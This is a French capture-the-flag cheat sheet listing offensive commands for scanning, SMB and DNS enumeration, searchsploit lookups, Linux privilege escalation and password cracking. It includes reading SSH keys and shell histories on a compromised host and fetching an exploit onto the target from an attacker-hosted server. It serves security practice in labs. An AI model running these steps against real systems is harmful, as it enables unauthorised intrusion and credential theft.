Capture The Flag
- Reconnaissance
- Metasploit
- DNS
- Vulnérabilités
- Local Privilege Escalation
- Cassage de mot de passe
- SQLite
Liens :
- https://attack.mitre.org/matrices
- https://www.thehacker.recipes
- https://nicolasb.fr/blog/dghack-my-second-ctf
Départ :
- commencer par brancher le câble réseau 😉
- lancer Wireshark pour observer ce qu'il se passe sur la ligne
- s'assigner une IP sur le même réseau
Reconnaissance
De manière générale :
- remarquer les versions
Si t'obtiens un accès sur un linux/windows :
- regarder l'historique des commandes
- regarder dans
$HOME/.ssh/
- regarder la table ARP (pour découvrir des hôtes sans faire de scan)
- regarder les routes pour découvrir d'autres réseaux
Sur Linux :
history
find /root /home -name *history*
find {/root,/home/*}/.ssh
ip n
ip -br a; echo; ip r
Sur Windows :
ipconfig -all
arp -a
route
Scan de port
# pinguer tout les hôtes d'un réseau (port 80 + ICMP echo-request)
nmap -T4 -sP 192.168.0.0/24
# scan discret (n'envoi que des TCP SYN, moins de chance que les connexions soient loggés)
nmap -T4 -sS <ip>
# OS + info sur les services
nmap -T4 -A -oN scan1.txt <ip>
# scan de vuln
nmap -T4 -sV --script vulners -oN scan1.txt <ip>
# sur tous les ports
nmap -T4 -sV --script vulners -oN scan1.txt <ip> -p-
TODO Enumération SMB
Si les ports 139
et 445
sont ouverts, il y a des chances que SMB tourne sur la machine.
enum4linux -U <ip>
Metasploit
msfconsole
DNS
Si on a trouvé un serveur DNS :
echo 'nameserver <ip>' >> /etc/resolv.conf
Voir tous les enregistrements d'un domaine :
host -a example.com
Mapper un domaine : https://dnsdumpster.com
Pour faire un transfert de zone :
dig @<?> AXFR <fqdn ?>
Vulnérabilités
Pour chercher des vulnérabilités :
ou la commande searchsploit
:
# pour chercher (case insensitive AND)
searchsploit cutenews
# lire l'exploit
searchsploit -x <filename>
# copier l'exploit dans le CWD
searchsploit -m <filename>
Local Privilege Escalation
Sur la machine cible :
# obtenir la version du noyau Linux
uname -a
# télécharger l'exploit (et le stocker en RAM)
wget URL > /dev/shm/lpe
Sur ta machine :
# regarder s'il existe des exploit
searchsploit 4.15
# le télécharger
searchsploit -m <filename>
# l'héberger
python -m SimpleHTTPServer
Cassage de mot de passe
Pour extraire le hash du mot de passe d'un zip : zip2john file.zip > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
SQLite
sqlitebrowser fichier.sqlite